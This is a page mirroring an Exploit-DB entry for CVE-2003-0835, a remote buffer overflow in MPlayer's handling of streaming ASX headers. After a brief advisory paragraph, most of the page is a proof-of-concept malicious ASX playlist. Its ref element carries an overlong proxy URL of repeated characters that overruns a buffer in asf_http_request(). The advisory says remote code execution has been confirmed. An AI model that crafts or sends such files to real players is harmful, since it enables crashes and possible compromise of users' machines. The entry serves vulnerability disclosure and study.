- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23186
- Проверка EDB
-
- Пройдено
- Автор
- OTERO HERNAN
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-2003-0835
- Дата публикации
- 2003-09-25
Код:
source: https://www.securityfocus.com/bid/8702/info
A vulnerability has been discovered in MPLayer when handling malformed streaming ASX file headers. The problem occurs due to insufficient bounds checking performed within asf_http_request(). It has been demonstrated that it is possible for a remote attacker to provide a malicious streaming ASX file that will overrun the bounds of a reserved buffer, when a vulnerable version of MPlayer is used to interpret the file. Remote arbitrary code execution has been confirmed possible.
<asx version = "3.0">
<title>Bas Site ASX</title>
<moreinfo href = "mailto:[email protected]
<mailto:[email protected]> " />
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/
<http://www.badsite.com/> " />
</banner>
<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>� All by the news</COPYRIGHT>
<ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://badsite.com/streaming/grupo.gif> " style="ICON" />
</entry>
</asx>- Источник
- www.exploit-db.com
